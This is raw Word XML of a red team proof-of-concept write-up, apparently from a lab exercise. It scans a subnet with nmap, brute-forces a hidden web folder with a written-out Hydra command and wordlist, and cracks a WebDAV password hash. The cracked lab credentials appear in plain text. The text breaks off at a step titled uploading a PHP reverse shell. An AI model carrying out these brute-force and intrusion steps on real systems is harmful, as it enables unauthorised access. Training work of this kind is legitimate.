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444B47" w14:textId="5A517FF2" w:rsidR="00CB122D" w:rsidRPr="000F4C0B" w:rsidRDefault="000F4C0B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F4C0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Proof of Concept, Red Team Exercise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0546733D" w14:textId="7ABFA587" w:rsidR="000F4C0B" w:rsidRDefault="000F4C0B"/>
    <w:p w14:paraId="260E6985" w14:textId="7583045B" w:rsidR="000F4C0B" w:rsidRPr="000F4C0B" w:rsidRDefault="000F4C0B" w:rsidP="000F4C0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F4C0B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Discover the IP address of the Linux web server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B473C53" w14:textId="77777777" w:rsidR="000F4C0B" w:rsidRDefault="000F4C0B" w:rsidP="000F4C0B"/>
    <w:p w14:paraId="3E4B15FD" w14:textId="7217E0C7" w:rsidR="000F4C0B" w:rsidRDefault="000F4C0B" w:rsidP="00F7163A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command ‘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192.168.1.1/24’ to scan the subnet 192.168.1.1/24 looking for the Linux web server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A466F21" w14:textId="093FB8B2" w:rsidR="0089463A" w:rsidRDefault="0089463A" w:rsidP="00F7163A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We see that IP 192.168.1.105 has an open http port 80 </w:t>
      </w:r>
      <w:r w:rsidR="00F7163A">
        <w:t>to a webserver (Apache httpd 2.4.29) with a Linux host OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DB6C9C" w14:textId="5DE28066" w:rsidR="00F7163A" w:rsidRDefault="00F7163A" w:rsidP="000F4C0B"/>
    <w:p w14:paraId="5564C031" w14:textId="6F5CB725" w:rsidR="00F7163A" w:rsidRDefault="00FE4C06" w:rsidP="000F4C0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709F5C" wp14:editId="0A15F926">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>123825</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1119505</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2895600" cy="1524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1524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5C98E" id="Rectangle 3" o:spid="_x0000_s1026" style="position:absolute;margin-left:9.75pt;margin-top:88.15pt;width:228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82B746" wp14:editId="79832CEC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>114300</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>871855</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2819400" cy="1619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1619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D81621" id="Rectangle 2" o:spid="_x0000_s1026" style="position:absolute;margin-left:9pt;margin-top:68.65pt;width:222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" fillcolor="yellow" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <v:fill opacity="32896f"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00F7163A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33EE6B2A" wp14:editId="454C2960">
            <wp:extent cx="5943600" cy="1515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F6F3" w14:textId="2528058D" w:rsidR="00F7163A" w:rsidRDefault="00F7163A" w:rsidP="000F4C0B"/>
    <w:p w14:paraId="23CDB433" w14:textId="639B5322" w:rsidR="00F7163A" w:rsidRDefault="00F7163A" w:rsidP="00F7163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7163A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Locate Hidden Directory on Web Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE9E802" w14:textId="16539F7E" w:rsidR="00F7163A" w:rsidRDefault="00F7163A" w:rsidP="00F7163A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C5E9AAC" w14:textId="3878F5BB" w:rsidR="00F7163A" w:rsidRDefault="00F7163A" w:rsidP="00F7163A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Open up</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00594F51">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.1.105:80</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="005F337E">
        <w:t xml:space="preserve">get a </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">main directory.  After researching the directories and files, under meet_our_team/ashton.txt we notice that </w:t>
      </w:r>
      <w:r w:rsidR="00942F76">
        <w:t>Ashton</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>is in charge of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a secret fo</w:t>
      </w:r>
      <w:r w:rsidR="005F337E">
        <w:t>lder (secret_folder) under company_folders.  Also, under meet_our_team, Hannah notes Ashton’s secret_folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0589E4F7" w14:textId="60E4CA00" w:rsidR="005F337E" w:rsidRDefault="005F337E" w:rsidP="005F337E"/>
    <w:p w14:paraId="5A6B5EA8" w14:textId="49C72FB8" w:rsidR="005F337E" w:rsidRDefault="005F337E" w:rsidP="005F337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AA2EF4" wp14:editId="15DC1AC0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2171700</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>667385</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1085850" cy="952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952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7C616" id="Rectangle 5" o:spid="_x0000_s1026" style="position:absolute;margin-left:171pt;margin-top:52.55pt;width:85.5pt;height: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5135CD" wp14:editId="37FAE72E">
            <wp:extent cx="5943600" cy="1147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9FDD" w14:textId="214DEC24" w:rsidR="005F337E" w:rsidRDefault="005F337E" w:rsidP="005F337E"/>
    <w:p w14:paraId="7026C2F3" w14:textId="6C1F342A" w:rsidR="005F337E" w:rsidRDefault="005F337E" w:rsidP="005F337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DEE491" wp14:editId="2F83A8BA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4343400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>636270</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1390650" cy="1143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143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8EE03" id="Rectangle 7" o:spid="_x0000_s1026" style="position:absolute;margin-left:342pt;margin-top:50.1pt;width:109.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D796F2" wp14:editId="68ECB951">
            <wp:extent cx="5943600" cy="8547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2A4B" w14:textId="50D53371" w:rsidR="005F337E" w:rsidRDefault="005F337E" w:rsidP="005F337E"/>
    <w:p w14:paraId="1E2345ED" w14:textId="1377E7AB" w:rsidR="005F337E" w:rsidRDefault="005F337E" w:rsidP="005F337E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Under company_folders there is no folder named secret_folder.  But, if we </w:t>
      </w:r>
      <w:r w:rsidR="0054472F">
        <w:t>manually type in the link as noted in Ashton’s meet_our_team page, we can gain access to the secret_folder, but the folder is password protected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FF51B3" w14:textId="0A65B419" w:rsidR="00942F76" w:rsidRDefault="00942F76" w:rsidP="00942F76"/>
    <w:p w14:paraId="7ABAC8FE" w14:textId="5A5E303F" w:rsidR="00942F76" w:rsidRDefault="007F3C32" w:rsidP="00942F7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8059E8" wp14:editId="782077D8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>66675</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>590549</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2438400" cy="18097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809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663DD" id="Rectangle 18" o:spid="_x0000_s1026" style="position:absolute;margin-left:5.25pt;margin-top:46.5pt;width:192pt;height:14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530F3C" wp14:editId="156969C4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1276350</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>247649</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1752600" cy="1238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238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CD43D" id="Rectangle 13" o:spid="_x0000_s1026" style="position:absolute;margin-left:100.5pt;margin-top:19.5pt;width:138pt;height:9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" fillcolor="yellow" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <v:fill opacity="32896f"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00942F76">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75CB1B72" wp14:editId="5C8E38C8">
            <wp:extent cx="5943600" cy="3589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FBB3" w14:textId="7061CB80" w:rsidR="0054472F" w:rsidRDefault="0054472F" w:rsidP="0054472F"/>
    <w:p w14:paraId="72C8D772" w14:textId="65BAFA03" w:rsidR="0054472F" w:rsidRDefault="0054472F" w:rsidP="0054472F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00942F76">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Brute Force the password to the hidden secret_folder directory using Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51162B5E" w14:textId="193AE700" w:rsidR="0054472F" w:rsidRDefault="0054472F" w:rsidP="0054472F"/>
    <w:p w14:paraId="03BCB40F" w14:textId="2E8CFB49" w:rsidR="0054472F" w:rsidRDefault="0054472F" w:rsidP="0054472F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The command line syntax to use hydra is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7190DD42" w14:textId="77777777" w:rsidR="00942F76" w:rsidRDefault="00942F76" w:rsidP="00942F76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08B3E8BA" w14:textId="4B454A16" w:rsidR="0054472F" w:rsidRDefault="0054472F" w:rsidP="0054472F">
      <w:r>
        <w:t xml:space="preserve">hydra -l &lt;password_username&gt; -P &lt;wordlist&gt; -s &lt;Port&gt; -f -vV </w:t>
      </w:r>
      <w:r w:rsidR="001F4E12">
        <w:t>&lt;victim_ip_address&gt; http-get &lt;path_to_directory_on_victim_machine&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C37FF84" w14:textId="4B523668" w:rsidR="001F4E12" w:rsidRDefault="001F4E12" w:rsidP="0054472F"/>
    <w:p w14:paraId="2BFE0A40" w14:textId="2C6861AF" w:rsidR="001F4E12" w:rsidRDefault="001F4E12" w:rsidP="0054472F">
      <w:r>
        <w:t xml:space="preserve">password_username = </w:t>
      </w:r>
      <w:r w:rsidR="00942F76">
        <w:t xml:space="preserve">after trying </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00942F76">
        <w:t>ashton</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00942F76">
        <w:t xml:space="preserve"> and Ashton, we find </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00942F76">
        <w:t>it’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00942F76">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00942F76">
        <w:t>ashton</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="38AB9D06" w14:textId="5DA73E2E" w:rsidR="001F4E12" w:rsidRDefault="001F4E12" w:rsidP="0054472F">
      <w:r>
        <w:t>wordlist = file with list of passwords = /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740950C3" w14:textId="4D48D178" w:rsidR="001F4E12" w:rsidRDefault="001F4E12" w:rsidP="0054472F">
      <w:r>
        <w:t>Port = 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D98B5EB" w14:textId="2C2758F5" w:rsidR="001F4E12" w:rsidRDefault="001F4E12" w:rsidP="0054472F">
      <w:r>
        <w:t>victim_ip_address = 192.168.1.105</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE1BD94" w14:textId="55116A05" w:rsidR="001F4E12" w:rsidRDefault="001F4E12" w:rsidP="0054472F">
      <w:r>
        <w:t>path_to_directory_on_victim_machine = /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>company_folders</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>secret_folder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="181D13CA" w14:textId="77777777" w:rsidR="00942F76" w:rsidRDefault="00942F76" w:rsidP="0054472F"/>
    <w:p w14:paraId="5B50780B" w14:textId="35D21B92" w:rsidR="0087251A" w:rsidRDefault="0087251A" w:rsidP="005447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24F2CB" wp14:editId="5725411F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>19050</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1934209</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3790950" cy="3905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3905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13D02" id="Rectangle 10" o:spid="_x0000_s1026" style="position:absolute;margin-left:1.5pt;margin-top:152.3pt;width:298.5pt;height:3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9B1EE4" wp14:editId="4B4034C0">
            <wp:extent cx="5943600" cy="25457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7FEA" w14:textId="21D0169E" w:rsidR="00942F76" w:rsidRDefault="00942F76" w:rsidP="0054472F"/>
    <w:p w14:paraId="24C5BFE0" w14:textId="17D6AD70" w:rsidR="0054472F" w:rsidRDefault="00942F76" w:rsidP="00942F76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The login/password to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>secret_folder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ashton</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001F156E">
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t>eopoldo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2F63DD90" w14:textId="38772366" w:rsidR="00942F76" w:rsidRDefault="00942F76" w:rsidP="00942F76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>After logging in under the secre</w:t>
      </w:r>
      <w:r w:rsidR="00B252A2">
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>_folder directory we see the following page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA46AF9" w14:textId="1B1F4396" w:rsidR="00942F76" w:rsidRDefault="00942F76" w:rsidP="00942F76"/>
    <w:p w14:paraId="19708E90" w14:textId="6DB2C568" w:rsidR="00942F76" w:rsidRDefault="00B252A2" w:rsidP="00942F7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4C2016" wp14:editId="79349891">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>19050</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1565911</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1466850" cy="17145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1714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B78E8" id="Rectangle 16" o:spid="_x0000_s1026" style="position:absolute;margin-left:1.5pt;margin-top:123.3pt;width:115.5pt;height:1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F2943B" wp14:editId="71CDE550">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1362075</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>308611</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2200275" cy="1714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714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55058" id="Rectangle 15" o:spid="_x0000_s1026" style="position:absolute;margin-left:107.25pt;margin-top:24.3pt;width:173.25pt;height:1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" fillcolor="yellow" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <v:fill opacity="32896f"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00942F76">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EEDBD57" wp14:editId="02E32AF9">
            <wp:extent cx="5943600" cy="2284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E026" w14:textId="6E07CE3E" w:rsidR="00942F76" w:rsidRDefault="00942F76" w:rsidP="00942F76"/>
    <w:p w14:paraId="3C800095" w14:textId="44998BBE" w:rsidR="00942F76" w:rsidRDefault="00942F76" w:rsidP="00942F76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connect_to_corp_server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B252A2">
        <w:t xml:space="preserve"> link provides instructions on how to connect to the corporate WebDAV server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5192D9BB" w14:textId="0D00E70D" w:rsidR="00B252A2" w:rsidRDefault="00B252A2" w:rsidP="00B252A2"/>
    <w:p w14:paraId="76AC8475" w14:textId="2D52A74A" w:rsidR="00B252A2" w:rsidRDefault="005F6FAE" w:rsidP="00B252A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E87C2D" wp14:editId="2D998958">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2389517</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>939992</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3122762" cy="120770"/>
                <wp:effectExtent l="0" t="0" r="20955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2762" cy="12077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BF8E4" id="Rectangle 21" o:spid="_x0000_s1026" style="position:absolute;margin-left:188.15pt;margin-top:74pt;width:245.9pt;height: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" fillcolor="yellow" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <v:fill opacity="32896f"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B252A2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58B2E0AE" wp14:editId="5FF43E23">
            <wp:extent cx="5943600" cy="1805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30B1" w14:textId="7104E6FD" w:rsidR="00B252A2" w:rsidRDefault="00B252A2" w:rsidP="00B252A2"/>
    <w:p w14:paraId="641E5ABD" w14:textId="27EBC866" w:rsidR="00B252A2" w:rsidRDefault="00EE46AF" w:rsidP="001A792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A792F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Break the hashed password for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A792F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ryan’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A792F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> account</w:t>
      </w:r>
      <w:r w:rsidR="001A792F" w:rsidRPr="001A792F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the instructions to connect to the corporate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A792F" w:rsidRPr="001A792F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>webdav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001A792F" w:rsidRPr="001A792F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> server using Crack Station</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B73B611" w14:textId="420BB963" w:rsidR="0013741F" w:rsidRDefault="0013741F" w:rsidP="0013741F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56D3D837" w14:textId="15F8CDC1" w:rsidR="0013741F" w:rsidRPr="0013741F" w:rsidRDefault="0013741F" w:rsidP="0013741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After de-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hashing</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the password we find </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ryan’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> password is linux4u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58640F1C" w14:textId="11A47FEA" w:rsidR="001A792F" w:rsidRDefault="001A792F" w:rsidP="00B252A2"/>
    <w:p w14:paraId="6ECBE635" w14:textId="2646489C" w:rsidR="001A792F" w:rsidRDefault="005F6FAE" w:rsidP="005F6FA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244F9F" wp14:editId="4B9EFEEF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4416724</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2770626</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="875221" cy="301924"/>
                <wp:effectExtent l="0" t="0" r="20320" b="2222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221" cy="30192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5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5979D" id="Rectangle 20" o:spid="_x0000_s1026" style="position:absolute;margin-left:347.75pt;margin-top:218.15pt;width:68.9pt;height:23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" fillcolor="yellow" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <v:fill opacity="22873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CCB118" wp14:editId="2DA6E9C5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>586596</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1683698</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1250830" cy="103516"/>
                <wp:effectExtent l="0" t="0" r="26035" b="107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10351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5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02B99" id="Rectangle 19" o:spid="_x0000_s1026" style="position:absolute;margin-left:46.2pt;margin-top:132.55pt;width:98.5pt;height:8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" fillcolor="yellow" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <v:fill opacity="22873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26E0654" wp14:editId="19188186">
            <wp:extent cx="5943600" cy="4294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516C" w14:textId="0B3965E4" w:rsidR="001A792F" w:rsidRDefault="001A792F" w:rsidP="00B252A2"/>
    <w:p w14:paraId="09547320" w14:textId="2968955B" w:rsidR="0013741F" w:rsidRDefault="0013741F" w:rsidP="0013741F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Connect to the WebDAV server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BD3D0B" w14:textId="2C368B8B" w:rsidR="00B252A2" w:rsidRDefault="00B252A2" w:rsidP="00B252A2"/>
    <w:p w14:paraId="439411E9" w14:textId="4664D970" w:rsidR="0013741F" w:rsidRDefault="0013741F" w:rsidP="0013741F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00594F51">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.1.105/webdav</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> and enter Ryan’s login and password (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ryan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/linux4u) to connect to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webdav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server shown below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F688D6" w14:textId="77777777" w:rsidR="0013741F" w:rsidRDefault="0013741F" w:rsidP="0013741F"/>
    <w:p w14:paraId="2C648125" w14:textId="74234F5F" w:rsidR="0013741F" w:rsidRDefault="0013741F" w:rsidP="0013741F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1497B07D" wp14:editId="3E198580">
            <wp:extent cx="5943600" cy="29375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E17B" w14:textId="0DFF1C32" w:rsidR="0013741F" w:rsidRDefault="0013741F" w:rsidP="0013741F"/>
    <w:p w14:paraId="71AF3E8B" w14:textId="1DC89A51" w:rsidR="0013741F" w:rsidRPr="0013741F" w:rsidRDefault="0013741F" w:rsidP="0013741F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Upload a PHP reverse shell payload</w:t>
      </w:r>
      <w:r w:rsidR="009C57E7">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> onto WebDAV server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EF7C36" w14:textId="77777777" w:rsidR="0013741F" w:rsidRDefault="0013741F" w:rsidP="0013741F">
      <w:pPr>
